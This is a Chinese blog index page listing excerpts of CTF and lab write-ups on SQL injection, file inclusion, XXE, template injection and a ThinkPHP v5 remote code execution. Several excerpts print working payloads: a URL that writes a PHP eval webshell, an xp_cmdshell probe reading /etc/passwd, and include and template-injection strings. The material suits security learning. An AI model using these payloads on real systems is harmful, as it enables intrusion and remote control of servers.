自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(18)
  • 收藏
  • 关注

原创 注入工具之sqlmap分析

Sqlmap在进行初始监测时会进行一些预检测GET /pikachu/vul/sqli/sqli_str.php?name=root&submit=查询&teEu=1187 AND 1=1 UNION ALL SELECT 1,NULL,‘’,table_name FROM information_schema.tables WHERE 2>1–/**/; EXEC xp_cmdshell(‘cat …/…/…/etc/passwd’)# HTTP/1.1#判断数据库类型和xss语句

2022-01-21 00:42:36 817

原创 [极客大挑战 2019]Upload 1

这题提示是上传然后上传了一个jpg带一句话的马上去结果报错这是内容检测到了<?然后试了一下ptml,没想到就成了在phtml中插入一句话GIF89a? 蚁剑连接

2021-02-24 14:31:44 127

原创 [极客大挑战 2019]Http 1

进入之后是点了半天没看出啥,这是我们就要考虑看源码果然这里有一个鼠标触发事件,超链接点进去发现它的来源不是https://www.Sycsecret.com抓个包,修改referer返回的又是另外一个,看来思路是对的,下面就是绕浏览器头直接修改user-agent又出现了另外一个,直接跟着走,让你干嘛,你就直接绕就行这是绕过原始访问用x-forwarded-for来绕过总结:当没有思路的时候,多看看网页源码...

2021-02-24 10:10:12 160

原创 [ACTF2020 新生赛]Include 1

[ACTF2020 新生赛]Include打开看到file=在结合题目include猜测是文件包含先试试=伪协议file=php://input构造payloadfile=php://filter/read=convert.base64-encode/resource=flag.phpbase64解密即可总结:掌握文件包含...

2021-02-23 17:10:38 102

原创 buuctf [极客大挑战 2019]BuyFlag1

buuctf [极客大挑战 2019]BuyFlag1打开之后界面是查看源码有两个超链接进入pay.php之后页面显示有三个条件students,100000000,password查看源码会发现有提示用post提交抓包绕过第一个student,这个有点像逻辑漏洞,将cookie中的user=0修改1之后就能绕过如下图绕password由于是==可以直接将404修改成404a就可以绕过这是前两个条件都满足了,最后一个金额不满足,思路是将金额用科学计数法来绕过总结:

2021-02-23 15:59:01 678

原创 x-ray windows安装

下载地址:https://github.com/chaitin/xray/releases安装流程:安装x-ray,要先安装证书下载之后解压,先不要运行,进入到该目录下的命令行模式运行xray_windows_amd64.exe genca会自动在该目录下生成证书双击ca.crt安装,下一步,然后入下图点击是证书安装成功然后运行一下试试xray_windows_amd64.exe webscan --listen 127.0.0.1:8800 --html-output v.ht

2020-09-18 10:28:36 133741

原创 vulnhub xxe解析

xxe原理就不进行介绍了XXE环境搭建xxe下载地址:https://download.vulnhub.com/xxe/XXE.zip也可以进去vulnhub,搜索xxe然后下载下载之后直接用虚拟机打开ovf文件安装之后的界面使用nmap扫描内网,发现一个157地址开放80打开之后出现下面界面表示安装成功根据要求是在/xxe/目录下进行测试,如果不知道的话可以用目录扫描工具进行扫描使用bp抓包看到用户名和密码被xml语句包含,由此想到xxe漏洞在构造语句前,目录扫描也有了结

2020-07-27 15:23:02 411

原创 burpsuit reCAPTCHA使用

下载地址https://github.com/bit4woo/reCAPTCHA安装如图然后就next抓包改里面的配置原来一共有三个,http://www.ysdm.net/home/PriceType这个网站被封了,现在只有下面这个了使用方法:一共有2种情况:用户名或密码之一+验证码;用户名+密码+验证码;1.用户名或密码之一+验证码;抓包payload1payload 22用户名+密码+验证码;payload 1payload 2和第一种情况一样...

2020-07-26 14:38:54 799

原创 关于ssh2john: commod not found

解决办法:1.切换到桌面2.

2020-06-18 15:33:45 451

原创 ctf.show web write up

web签到题直接审查源码,就有一个base64加密的flag,直接解码就行ctf.show_web2进去之后是一个登陆框试一下万能密码admin‘or 1=1#发现成功了试了之后发现一共有三个字段根据回显点再来测试查询数据库和表字段数据库username=admin&password=’ union select 1,database(),3#表username=a...

2020-06-18 15:32:43 253

原创 攻防世界 后面持续更新

XCTF 4th-CyberEarth打开之后乱点,点到报表中心的时候连接到一个新网址连接到id=1这里抓包爆破得到flagHCTF 2018审查源码发现有一个source.php打开有一个hint.php打开之后是flag not here, and flag in ffffllllaaaagggg在代码审核,关键代码检查是否为空,是不是字符,在使用检测函数检测·$whitelist = [“source”=>“source.php”,“hint”=>“hint.

2020-06-18 15:32:07 149

原创 webug4.0 后面持续更新

第四关:post注入打开网站在搜索框中输入‘,之后报错用bp抓包之后保存在本地直接用sqlmap跑,跑数据库sqlmap -r C:\Users\Administrator\Desktop\2.txt -p “keyWordName” --level=2 --dbs --batch 表名sqlmap -r C:\Users\Administrator\Desktop\2.txt -p “keyWordName” --level=2 -D webug --tables --batch字段名

2020-06-18 15:31:31 234

原创 web_php_include

审查源码之后发现当page=hello这条语句为真的时候,就可以执行文件包含然后可以构造语句?page=http://124.126.19.106:43971/index.php?hello=<?system('ls');?>来查看有哪些文件直接构造语句查看flag?page=http://124.126.19.106:43971/index.php?hello=<?show_source('fl4gisisish3r3.php');?>...

2020-05-19 11:05:25 272

原创 攻防世界高阶之php_rce

打开是thinkphp v5版本根据版本号查询到有一个远程代码执行漏洞,查看权限可以产看到PHPinfo直接写一句话上传上去?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=shell.php&vars[1][1]=<?php eval($_REQUEST["a"]);?>用蚁剑连接之后在主目录下发

2020-05-18 17:34:07 7828 2

原创 攻防世界WEB高手进阶之python_template_injection

打开网站是写着以下然后测试以下{{1+1}}被执行了然后测试{{’’.class.mro[2].subclasses()[71].init.globals[‘os’].listdir(’.’)}}发现有一个flag使用{{’’.class.mro[2].subclasses()40.read()}}打开

2020-05-18 16:54:17 434

原创 记得一次靶机ftp后门利用

记得一次靶机ftp后门利用靶机地址:192.168.73.153攻击地址:192.168.73.145查看本机地址扫描整个网段查看靶机地址是否存活扫描靶机地址开放了那些端口利用metasploit搜寻该版本的ftp是否有漏洞开始利用加载一个payload设置地址,rhosts 是靶机地址,lhost是攻击机地址,Run之后就得到shell由于得到的权限可以直...

2020-05-06 23:06:38 210

转载 [GYCTF2020]Blacklist&&[强网杯 2019]随便注

因为2020blacklist是2019随便注的升级版,所以借着这个机会归纳一下先做个比较两道题的不同处,由此可见blacklist是随便注的升级版。blacklist比随便注多过滤了set,prepare,rename,alter。过滤prepare,set是避免pdo预处理绕过过滤rename,alter是避免修改表名的情况出现而blacklist和随便注还有一种方法是handler...

2020-05-06 15:49:52 461

转载 xxe - lab

php-xxe我们抓一下包看一下吧。看到了我们发送的用户名/密码都是以POST形式发送的。并且很像是xml文档、接下来开始源码审计。<?php/*** autor: c0ny1* date: 2018-2-7*/$USERNAME = 'admin'; //账号$PASSWORD = 'admin'; //密码$result = null;libxml_dis...

2020-04-22 16:38:14 281

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除